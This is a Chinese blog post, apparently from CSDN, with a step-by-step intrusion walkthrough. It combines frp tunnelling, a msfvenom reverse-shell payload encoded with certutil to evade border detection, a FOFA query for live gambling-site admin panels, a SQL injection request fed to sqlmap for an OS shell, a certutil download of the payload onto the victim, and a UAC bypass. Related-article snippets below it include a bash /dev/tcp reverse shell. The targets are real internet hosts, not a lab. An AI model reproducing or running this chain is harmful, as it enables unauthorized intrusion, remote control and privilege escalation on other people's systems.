FRP+MSF+注入反弹shell

最新推荐文章于 2023-08-21 09:19:16 发布
最新推荐文章于 2023-08-21 09:19:16 发布
阅读量4.2k 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dahege666/article/details/124327548
版权

实验环境:

        XXX云ECS一台:x.x.x.x

        内网kali控制端:192.168.250.133

        外网注入后台win7主机:

操作步骤:

  • 分别在XXXECS、内网kali控制端搭建frp

具体方法参见:

安装frp_叶孤心丶的博客-CSDN博客_frp安装

  • 配置
  1. 内网kali控制端配置 vi frpc.ini

  1. XXX云ECS配置  vim frps.ini

  • 启动FRP
  1. 本地Kali linux 启动 FRP

./frpc -c ./frpc.ini

2、XXX云ECS启动FRP

./frps -c ./frps.ini

  • msfvenom制作Windows木马程序

msfvenom -p windows/meterpreter/reverse_tcp lhost=你的公网ip lport=6000 -f exe >FRP.exe

 将FRP.exe文件进行base64编码,以便绕过边界设备的安全检测生成文件FRP.txt:

Certutil -encode FRP.exe FRP.txt

然后将FRP.txt传到阿里云服务器中,使之能够被远程访问

   注:SSH上传不成功,因此改为SFTP传输:sftp root@x.x.x.x

远程访问一下试试:http://X.X.X.X/FRP.txt

  • 在kali中开始监听

msfconsole

 msf > use exploit/multi/handler

 msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

 payload => windows/meterpreter/reverse_tcp

 msf exploit(multi/handler) > set lhost 127.0.0.1   #设置监听ip,必须和frpc中的local_ip 一致

 lhost => 127.0.0.1

 msf exploit(multi/handler) > set lport 4444        #设置监听端口,与frpc中的local_port一致

 lport =>4444

 msf exploit(multi/handler) > exploit

  • 寻找目标

FOFA搜索词:body="棋牌后台管理系统" && title=="后台登录"

  • 制作SQL注入请求包,用SQLMAP获得得Shell

POST /Login/ValidateLogin HTTP/1.1

Host: 111.XX.XX.XX:8001

Content-Length: 30

Accept: application/json, text/javascript, */*; q=0.01

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Origin: http://111.XX.XX.XX:8001

Referer: http://111.XX.XX.XX:8001/Login/index

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6

Cookie: Hm_lvt_8ee3ec23e73c6dcda2c7c9c489c151aa=1599407883; RYQIPAI=RYCacheKey=1&RYCacheKey_ETS=2020-09-07+00%3a28%3a17&VS=07a6f8746a60ecc3; ASP.NET_SessionId=udnrj5bxpuchvrf4fs4oute3; BT_PANEL_6=3a8e87d5-ad8a-4db2-9e57-c3a1684991e0._Tklm_sxRP6Gk0jcgXfEFwQVt9Y; Hm_lpvt_8ee3ec23e73c6dcda2c7c9c489c151aa=1599429027

Connection: close

userName=123*&password=321

在注入处标上*,上方请求包内的请求头Host参数修改成你目标域名或IP:端口,然后直接扔sqlmap执行:

sqlmap -r post.txt --os-shell

即可获取交互shell

  • 用win自带的certutil.exe下载msf生成的shell---FRP.txt 然后提权。

在shell中将FRP.txt下载到本机,并命为frp0.txt

certutil.exe -urlcache -split -f "https://X.X.X.X/FRP.txt" frp0.txt

等下载完成后,执行下面的命令将frp0.txt解码为exe文件:

certutil.exe -decode frp0.txt frp0.exe

在os-shell中运行frp0.exe

  • KALI 本地获得反弹shell,提权

   在frp0.exe被执行后,可以看到前面MSF监听的获得下面的meterpreter会话

    重新打开一个msfconsole 在已经获得的会话中再执行提权

     use exploit/windows/local/bypassuac

   

  或者通过Eventvwr注册表项UAC保护绕过

我是哥哥。
关注
专栏目录
利用frp将cs的shell派生到msf
weixin_43939009的博客
06-27 765
msf作为内网渗透中强大的工具,集成了许多漏洞利用的EXP,以及各种扫描功能便于使用,今天介绍使用Frp将cs的shell派生到msf,满足内网渗透中的需求。 第一步: 首先我们连上cs后,我们需要去监听器修改参数。 我们这里Add添加一个,随便写个名字,这里我写了msf,模式选择foreign HTTP模式,HTTP Host出填写自己的VPS地址,端口随意,我这里是1080端口。填写完毕Save即可。 第二步: 在自己的vps上启动frp服务端,frp不多做介绍,目前主流的内网穿透工具,这里基础使用
运维知识点-linux操作系统-linux命令行-BashShell
最新发布
aming小老弟
11-17 699
Yum(全称为 Yellow dog Updater, Modified)是一个在Fedora和RedHat以及CentOS中的Shell前端软件包管理器。基于RPM包管理,能够从指定的1、显示已经安装的软件包2、查找可以安装的软件包 (以 tomcat 为例)3、安装软件包 (以 tomcat 为例)4、卸载软件包 (以 tomcat 为例)5、列出软件包的依赖 (以 tomcat 为例)6、-y 自动应答yes我们可以用 -y 来应答所有的 yes , 比如我们安装 tomcat 的时候,
frpmsf联动
weixin_51277792的博客
08-21 152
frpmsf联动
使用msf监听模块接收反弹shell
-
05-23 2331
msf
msf监听php反弹shell,使用msf进行反弹shell+内网渗透
weixin_39777242的博客
03-16 1735
首先说明一点,反弹shell的前提是该主机可以执行咱们的恶意命令反弹shell的原理与灰鸽子的原理是类似的,就是在靶机上执行一个咱们msf精心构造的客户端,使靶机主动回连咱们攻击机的某个端口。下面开始说明使用msf进行反弹shell的过程。1、反弹shell:1.首先使用msf中的msfvenom模块生成一个被控端的客户端文件。这里以Windows 64位为例,具体命令以下:“msfvenom -...
【内网穿透】Frp 自建跳板-两个内网通讯上线-反弹shell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
06-24 2110
Frp自建跳板,实现两个内网通讯上线并反弹shell,内网frp穿透技术小记。
Metasploit 渗透测试之制作隐藏后门
weixin_46035615的博客
05-01 2889
1. 实战-使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透 2. 实战-Linux 无文件木马程序 3. 实战-使用脚本来进行自动创建后门 4. 系统日志清理
红队培训班作业 | 五种免杀bypass火绒360姿势横向测评:哪款更适合你?
Ms08067安全实验室
09-01 1478
文章来源|MS08067 红队培训班第12节课作业本文作者:某学员A(红队培训班1期学员)按老师要求尝试完成布置的作业如下:一、远程线程注入(一)通过MSF生成payload通过msfve...
2021-7-7红日团队靶场一
热门推荐
qq_45290991的博客
07-16 1万+
这是第二次打靶场,也是实战第一次。写的比较详(luo)细(suo),看官莫怪。期间参考了很多资料,后来我也看了好几个,觉得谢公子大佬写的最详细,这里安利一波大佬神文:谢公子红日靶场一 一、环境配置 首先感谢红日安全团队分享的靶机实战环境。红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。 靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/ 本文的目的是为了记录和巩固知识点,并分享出来,希望对大家能有所帮助。
ATT&CK红队评估(红日靶场四)
weixin_45682839的博客
04-28 5594
ATT&CK红队评估(红日靶场四)通关攻略,涉及知识包括: Struts2漏洞利用、phpmyadmin getshell、tomcat 漏洞利用、ms17_010、docker逃逸、ms14_068、ssh密钥利用、流量转发、横向移动、内网渗透等。
frp内网穿透教程2023最新(含内网ssh配置与msf联动配置)
qq1140037586的博客
08-31 3632
frp是一个高性能的反向代理应用,可以帮助您轻松地进行内网穿透,对外网提供服务, 支持tcp, udp, http,https等协议类型,并且web服务支持根据域名进行路由转发。
frpmsfshell的一个内网穿透
aicsswo的博客
11-08 1048
/frps -c frps.ini#后台运行nohup /root/frp/frps -c /root/frp/frps.ini &#结束pkill frps。如果输出的是其他的,则在文件列表中找 linux 的对应架构的压缩包。这里设置[common] 和 [mdf] 就可以用了 server_addr就是你的云服务器ip,token就是前面你设置的,其他照抄就行。.打开你的云服务器,随便你通过什么管理你的云服务器(ssh好还是其他软件能进行就ko)然后进入解压好的目录问文件:(cd命令进入)
反弹shell原理和实现
u012830303的博客
01-18 3540
当一些框架和代码,不小心让可执行shell命令的函数存在注入漏洞时,会被利用注入漏洞执行一些shell命令。入侵者为了防止漏洞被修复,无法通过正向链接侵入服务器时,会被利用shell反弹原理种马。 首先,侵入者会利用注入参数,创建一个shell.php文件,文件内容如下 通过web访问并执行shell.php文件 exec('bash -i &> /dev/tcp/10.201.61.194/5566 0>&1'); 这条命令的作用是,在服务器建立一个可以与10.201.61.
内网渗透-利用frp代理流量后msf攻击内网永恒之蓝漏洞(ms17-010)-永恒之蓝利用失败的原因
weixin_42109829的博客
01-18 1万+
0x01 前言 当我们进内网的的时候,会遇到永恒之蓝这种漏洞,之前不懂代理的时候,总是不找到怎么利用,等到我学会了流量代理,frp等工具,才慢慢理解各种协议,各种流量方式的通信方式。 初级–》frp代理了解 进阶–》多层代理 0x02 靶场环境 靶场搭建 0x03 frp简易配置 frp 的配置分为两部分,一个是在公网的vps 运行的 frps 程序 一个是在内网运行的frpc 程序, 下载地址 https://github.com/fatedier/frp/releases/tag/v0.38.0 一、
msf反弹shell
qq_41232519的博客
08-14 715
文章目录一、生成木马二、执行监听三、上传并执行木马 一、生成木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.159.128 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为192.168.159.128,监听端口为4444,文件输出格式为exe并保存到路径/tmp/hack.exe
Frp搭建反向代理
阿鱼的小世界
12-21 3236
Frp搭建socks反向代理
SQL注入(二)mysql、PostgreSQL、MSSQL
m0_63917373的博客
10-03 420
SQL注入(二)mysql、PostgreSQL、MSSQL
MSF+FRP实现内网穿透进行远控
dogeable的博客
01-30 2401
MSF+FRP实现内网穿透进行远控
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值